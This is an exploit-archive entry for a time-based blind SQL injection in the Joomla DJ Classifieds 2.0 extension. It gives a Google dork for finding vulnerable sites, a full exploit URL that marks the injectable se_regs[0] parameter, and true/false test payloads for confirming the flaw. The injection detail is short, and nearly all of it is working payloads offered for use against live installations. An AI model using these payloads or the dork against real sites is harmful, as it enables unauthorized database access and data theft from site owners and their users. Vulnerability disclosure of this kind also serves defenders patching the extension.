[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla DJ Classifieds Extension 2.0 - Blind SQL Injection Vulnerability
# Published : 2013-05-06
# Author :
# Previous Title : GetSimpleCMS 3.2.1 Arbitrary File Upload Vulnerability
# Next Title : Ajax Availability Calendar 3.X.X - Multiple Vulnerabilties
$$$$$$ $$ $$ $$$$$$
$$ __$$ $$ | $$ | $$ __$$
$$ / __| $$ | $$ | $$ / __|
$$ |$$$$ $$$$$$$$ | $$$$$$
$$ |_$$ | $$ __$$ | ____$$
$$ | $$ | $$ | $$ | $$ $$ |
$$$$$$ |$$ $$ | $$ |$$\$$$$$$ |
______/ __|__| __|__|______/
# Exploit Title: Joomla - DJ Classifieds - Time-Based Blind SQL Injection
# Google Dork: inurl:"index.php/dj-classifieds/" or inurl:"/dj-classifieds/"
# Date: 4/5/2013
# Exploit Author: Napsterakos
# Vendor Homepage: http://design-joomla.eu
# Software Link: -
# Version: 2.0
# Tested on: Linux
Link: http://server/joomla/index.php/dj-classifieds/
Exploit: http://server/joomla/index.php/dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=[SQLi]
# Exploit-DB Note:
# dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=0
# dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=1
Credits to: Greek Hacking Scene